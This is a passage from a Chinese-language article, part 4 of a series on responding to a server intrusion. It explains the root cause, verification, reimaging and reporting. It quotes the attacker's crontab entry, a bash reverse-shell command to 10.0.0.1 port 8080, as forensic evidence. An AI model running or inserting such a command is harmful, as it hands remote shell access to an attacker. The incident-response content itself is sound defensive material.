年关将至,服务器被入侵了怎么办?(4)
时间:2018-12-14 19:18 来源:网络整理 作者:墨客科技 点击:次
通过被入侵机器所跑服务、iptables状态,确认是所跑服务支持远程命令执行,且机器iptables为空导致黑客通过往/etc/crontab中写“bash -i >& /dev/tcp/10.0.0.1/8080 0>&1”命令方式进行shell反弹,从而入侵了机器。 6、验证修复、机器下线重装 进行以上修复操作后,监控未发现再有异常,于是将机器下线重装。 7、完成安全事件处理报告 每次安全事件处理后,都应当整理成报告,不管是知识库的构建,还是统计分析安全态势,都是很有必要的。 这次主要介绍了服务器被入侵时推荐的一套处理思路。实际上,安全防护跟运维思路一样,都是要防患于未然,这时候的审计或者响应其实很难避免危害的发生了,我们更希望通过安全意识教育、安全制度的建设,在问题显露端倪时即可消弭于无形。 精选专题(官网:dbaplus.cn) ◆ 近期热文 ◆ (责任编辑:admin) |